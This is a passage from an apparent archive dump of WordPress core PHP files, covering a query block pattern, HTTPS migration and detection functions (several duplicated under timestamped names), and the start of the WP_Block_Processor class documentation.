if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
query-medium-posts.php 0000666 00000002035 15224151221 0011045 0 ustar 00 <?php
/**
* Query: Image at left.
*
* @package WordPress
*/
return array(
'title' => _x( 'Image at left', 'Block pattern title' ),
'blockTypes' => array( 'core/query' ),
'categories' => array( 'query' ),
'content' => '<!-- wp:query {"query":{"perPage":3,"pages":0,"offset":0,"postType":"post","order":"desc","orderBy":"date","author":"","search":"","exclude":[],"sticky":"","inherit":false}} -->
<div class="wp-block-query">
<!-- wp:post-template -->
<!-- wp:columns {"align":"wide"} -->
<div class="wp-block-columns alignwide"><!-- wp:column {"width":"66.66%"} -->
<div class="wp-block-column" style="flex-basis:66.66%"><!-- wp:post-featured-image {"isLink":true} /--></div>
<!-- /wp:column -->
<!-- wp:column {"width":"33.33%"} -->
<div class="wp-block-column" style="flex-basis:33.33%"><!-- wp:post-title {"isLink":true} /-->
<!-- wp:post-excerpt /--></div>
<!-- /wp:column --></div>
<!-- /wp:columns -->
<!-- /wp:post-template -->
</div>
<!-- /wp:query -->',
);
https-migration-20260606113308-20260621212809.php 0000666 00000011205 15224151221 0013355 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605112435-20260621081211.php 0000666 00000013341 15224151221 0013333 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605091832.php 0000666 00000013341 15224151221 0011765 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260607154209.php 0000666 00000013341 15224151221 0011765 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-block-processor-20260621165707.php 0000666 00000210507 15224151221 0013511 0 ustar 00 <?php
/**
* Efficiently scan through block structure in document without parsing
* the entire block tree and all of its JSON attributes into memory.
*
* @package WordPress
* @subpackage Blocks
* @since 6.9.0
*/
/**
* Class for efficiently scanning through block structure in a document
* without parsing the entire block tree and JSON attributes into memory.
*
* ## Overview
*
* This class is designed to help analyze and modify block structure in a
* streaming fashion and to bridge the gap between parsed block trees and
* the text representing them.
*
* Use-cases for this class include but are not limited to:
*
* - Counting block types in a document.
* - Queuing stylesheets based on the presence of various block types.
* - Modifying blocks of a given type, i.e. migrations, updates, and styling.
* - Searching for content of specific kinds, e.g. checking for blocks
* with certain theme support attributes, or block bindings.
* - Adding CSS class names to the element wrapping a block’s inner blocks.
*
* > *Note!* If a fully-parsed block tree of a document is necessary, including
* > all the parsed JSON attributes, nested blocks, and HTML, consider
* > using {@see \parse_blocks()} instead which will parse the document
* > in one swift pass.
*
* For typical usage, jump first to the methods {@see self::next_block()},
* {@see self::next_delimiter()}, or {@see self::next_token()}.
*
* ### Values
*
* As a lower-level interface than {@see parse_blocks()} this class follows
* different performance-focused values:
*
* - Minimize allocations so that documents of any size may be processed
* on a fixed or marginal amount of memory.
* - Make hidden costs explicit so that calling code only has to pay the
* performance penalty for features it needs.
* - Operate with a streaming and re-entrant design to make it possible
* to operate on chunks of a document and to resume after pausing.
*
* This means that some operations might appear more cumbersome than one
* might expect. This design tradeoff opens up opportunity to wrap this in
* a convenience class to add higher-level functionality.
*
* ## Concepts
*
* All text documents can be considered a block document containing a combination
* of “freeform HTML” and explicit block structure. Block structure forms through
* special HTML comments called _delimiters_ which include a block type and,
* optionally, block attributes encoded as a JSON object payload.
*
* This processor is designed to scan through a block document from delimiter to
* delimiter, tracking how the delimiters impact the structure of the document.
* Spans of HTML appear between delimiters. If these spans exist at the top level
* of the document, meaning there is no containing block around them, they are
* considered freeform HTML content. If, however, they appear _inside_ block
* structure they are interpreted as `innerHTML` for the containing block.
*
* ### Tokens and scanning
*
* As the processor scans through a document is reports information about the token
* on which is pauses. Tokens represent spans of text in the input comprising block
* delimiters and spans of HTML.
*
* - {@see self::next_token()} visits every contiguous subspan of text in the
* input document. This includes all explicit block comment delimiters and spans
* of HTML content (whether freeform or inner HTML).
* - {@see self::next_delimiter()} visits every explicit block comment delimiter
* unless passed a block type which covers freeform HTML content. In these cases
* it will stop at top-level spans of HTML and report a `null` block type.
* - {@see self::next_block()} visits every block delimiter which _opens_ a block.
* This includes opening block delimiters as well as void block delimiters. With
* the same exception as above for freeform HTML block types, this will visit
* top-level spans of HTML content.
*
* When matched on a particular token, the following methods provide structural
* and textual information about it:
*
* - {@see self::get_delimiter_type()} reports whether the delimiter is an opener,
* a closer, or if it represents a whole void block.
* - {@see self::get_block_type()} reports the fully-qualified block type which
* the delimiter represents.
* - {@see self::get_printable_block_type()} reports the fully-qualified block type,
* but returns `core/freeform` instead of `null` for top-level freeform HTML content.
* - {@see self::is_block_type()} indicates if the delimiter represents a block of
* the given block type, or wildcard or pseudo-block type described below.
* - {@see self::opens_block()} indicates if the delimiter opens a block of one
* of the provided block types. Opening, void, and top-level freeform HTML content
* all open blocks.
* - {@see static::get_attributes()} is currently reserved for a future streaming
* JSON parser class.
* - {@see self::allocate_and_return_parsed_attributes()} extracts the JSON attributes
* for delimiters which open blocks and return the fully-parsed attributes as an
* associative array. {@see static::get_last_json_error()} for when this fails.
* - {@see self::is_html()} indicates if the token is a span of HTML which might
* be top-level freeform content or a block’s inner HTML.
* - {@see self::get_html_content()} returns the span of HTML.
* - {@see self::get_span()} for the byte offset and length into the input document
* representing the token.
*
* It’s possible for the processor to fail to scan forward if the input document ends
* in a proper prefix of an explicit block comment delimiter. For example, if the input
* ends in `<!-- wp:` then it _might_ be the start of another delimiter. The parser
* cannot know, however, and therefore refuses to proceed. {@see static::get_last_error()}
* to distinguish between a failure to find the next token and an incomplete input.
*
* ### Block types
*
* A block’s “type” comprises an optional _namespace_ and _name_. If the namespace
* isn’t provided it will be interpreted as the implicit `core` namespace. For example,
* the type `gallery` is the name of the block in the `core` namespace, but the type
* `abc/gallery` is the _fully-qualified_ block type for the block whose name is still
* `gallery`, but in the `abc` namespace.
*
* Methods on this class are aware of this block naming semantic and anywhere a block
* type is an argument to a method it will be normalized to account for implicit namespaces.
* Passing `paragraph` is the same as passing `core/paragraph`. On the contrary, anywhere
* this class returns a block type, it will return the fully-qualified and normalized form.
* For example, for the `<!-- wp:group -->` delimiter it will return `core/group` as the
* block type.
*
* There are two special block types that change the behavior of the processor:
*
* - The wildcard `*` represents _any block_. In addition to matching all block types,
* it also represents top-level freeform HTML whose block type is reported as `null`.
*
* - The `core/freeform` block type is a pseudo-block type which explicitly matches
* top-level freeform HTML.
*
* These special block types can be passed into any method which searches for blocks.
*
* There is one additional special block type which may be returned from
* {@see self::get_printable_block_type()}. This is the `#innerHTML` type, which
* indicates that the HTML span on which the processor is paused is inner HTML for
* a containing block.
*
* ### Spans of HTML
*
* Non-block content plays a complicated role in processing block documents. This
* processor exposes tools to help work with these spans of HTML.
*
* - {@see self::is_html()} indicates if the processor is paused at a span of
* HTML but does not differentiate between top-level freeform content and inner HTML.
* - {@see self::is_non_whitespace_html()} indicates not only if the processor
* is paused at a span of HTML, but also whether that span incorporates more than
* whitespace characters. Because block serialization often inserts newlines between
* block comment delimiters, this is useful for distinguishing “real” freeform
* content from purely aesthetic syntax.
* - {@see self::is_block_type()} matches top-level freeform HTML content when
* provided one of the special block types described above.
*
* ### Block structure
*
* As the processor traverses block delimiters it maintains a stack of which blocks are
* open at the given place in the document where it’s paused. This stack represents the
* block structure of a document and is used to determine where blocks end, which blocks
* represent inner blocks, whether a span of HTML is top-level freeform content, and
* more. Investigate the stack with {@see self::get_breadcrumbs()}, which returns an
* array of block types starting at the outermost-open block and descending to the
* currently-visited block.
*
* Unlike {@parse_blocks()}, spans of HTML appear in this structure as the special
* reported block type `#html`. Such a span represents inner HTML for a block if the
* depth reported by {@see self::get_depth()} is greater than one.
*
* It will generally not be necessary to inspect the stack of open blocks, though
* depth may be important for finding where blocks end. When visiting a block opener,
* the depth will have been increased before pausing; in contrast the depth is
* decremented before visiting a closer. This makes the following an easy way to
* determine if a block is still open.
*
* Example:
*
* $depth = $processor->get_depth();
* while ( $processor->next_token() && $processor->get_depth() > $depth ) {
* continue
* }
* // Processor is now paused at the token immediately following the closed block.
*
* #### Extracting blocks
*
* A unique feature of this processor is the ability to return the same output as
* {@see \parse_blocks()} would produce, but for a subset of the input document.
* For example, it’s possible to extract an image block, manipulate that parsed
* block, and re-serialize it into the original document. It’s possible to do so
* while skipping over the parse of the rest of the document.
*
* {@see self::extract_full_block_and_advance()} will scan forward from the current block opener
* and build the parsed block structure until the current block is closed. It will
* include all inner HTML and inner blocks, and parse all of the inner blocks. It
* can be used to extract a block at any depth in the document, helpful for operating
* on blocks within nested structure.
*
* Example:
*
* if ( ! $processor->next_block( 'gallery' ) ) {
* return $post_content;
* }
*
* $gallery_at = $processor->get_span()->start;
* $gallery_block = $processor->extract_full_block_and_advance();
* $after_gallery = $processor->get_span()->start;
* return (
* substr( $post_content, 0, $gallery_at ) .
* serialize_block( modify_gallery( $gallery_block ) .
* substr( $post_content, $after_gallery )
* );
*
* #### Handling of malformed structure
*
* There are situations where closing block delimiters appear for which no open block
* exists, or where a document ends before a block is closed, or where a closing block
* delimiter appears but references a different block type than the most-recently
* opened block does. In all of these cases, the stack of open blocks should mirror
* the behavior in {@see \parse_blocks()}.
*
* Unlike {@see \parse_blocks()}, however, this processor can still operate on the
* invalid block delimiters. It provides a few functions which can be used for building
* custom and non-spec-compliant error handling.
*
* - {@see self::has_closing_flag()} indicates if the block delimiter contains the
* closing flag at the end. Some invalid block delimiters might contain both the
* void and closing flag, in which case {@see self::get_delimiter_type()} will
* report that it’s a void block.
* - {@see static::get_last_error()} indicates if the processor reached an invalid
* block closing. Depending on the context, {@see \parse_blocks()} might instead
* ignore the token or treat it as freeform HTML content.
*
* ## Static helpers
*
* This class provides helpers for performing semantic block-related operations.
*
* - {@see self::normalize_block_type()} takes a block type with or without the
* implicit `core` namespace and returns a fully-qualified block type.
* - {@see self::are_equal_block_types()} indicates if two spans across one or
* more input texts represent the same fully-qualified block type.
*
* ## Subclassing
*
* This processor is designed to accurately parse a block document. Therefore, many
* of its methods are not meant for subclassing. However, overall this class supports
* building higher-level convenience classes which may choose to subclass it. For those
* classes, avoid re-implementing methods except for the list below. Instead, create
* new names representing the higher-level concepts being introduced. For example, instead
* of creating a new method named `next_block()` which only advances to blocks of a given
* kind, consider creating a new method named something like `next_layout_block()` which
* won’t interfere with the base class method.
*
* - {@see static::get_last_error()} may be reimplemented to report new errors in the subclass
* which aren’t intrinsic to block parsing.
* - {@see static::get_attributes()} may be reimplemented to provide a streaming interface
* to reading and modifying a block’s JSON attributes. It should be fast and memory efficient.
* - {@see static::get_last_json_error()} may be reimplemented to report new errors introduced
* with a reimplementation of {@see static::get_attributes()}.
*
* @since 6.9.0
*/
class WP_Block_Processor {
/**
* Indicates if the last operation failed, otherwise
* will be `null` for success.
*
* @since 6.9.0
*
* @var string|null
*/
private $last_error = null;
/**
* Indicates failures from decoding JSON attributes.
*
* @since 6.9.0
*
* @see \json_last_error()
*
* @var int
*/
private $last_json_error = JSON_ERROR_NONE;
/**
* Source text provided to processor.
*
* @since 6.9.0
*
* @var string
*/
protected $source_text;
/**
* Byte offset into source text where a matched delimiter starts.
*
* Example:
*
* 5 10 15 20 25 30 35 40 45 50
* <!-- wp:group --><!-- wp:void /--><!-- /wp:group -->
* ╰─ Starts at byte offset 17.
*
* @since 6.9.0
*
* @var int
*/
private $matched_delimiter_at = 0;
/**
* Byte length of full span of a matched delimiter.
*
* Example:
*
* 5 10 15 20 25 30 35 40 45 50
* <!-- wp:group --><!-- wp:void /--><!-- /wp:group -->
* ╰───────────────╯
* 17 bytes long.
*
* @since 6.9.0
*
* @var int
*/
private $matched_delimiter_length = 0;
/**
* First byte offset into source text following any previously-matched delimiter.
* Used to indicate where an HTML span starts.
*
* Example:
*
* 5 10 15 20 25 30 35 40 45 50 55
* <!-- wp:paragraph --><p>Content</p><⃨!⃨-⃨-⃨ ⃨/⃨w⃨p⃨:⃨p⃨a⃨r⃨a⃨g⃨r⃨a⃨p⃨h⃨ ⃨-⃨-⃨>⃨
* │ ╰─ This delimiter was matched, and after matching,
* │ revealed the preceding HTML span.
* │
* ╰─ The first byte offset after the previous matched delimiter
* is 21. Because the matched delimiter starts at 55, which is after
* this, a span of HTML must exist between these boundaries.
*
* @since 6.9.0
*
* @var int
*/
private $after_previous_delimiter = 0;
/**
* Byte offset where namespace span begins.
*
* When no namespace is present, this will be the same as the starting
* byte offset for the block name.
*
* Example:
*
* <!-- wp:core/gallery -->
* │ ╰─ Name starts here.
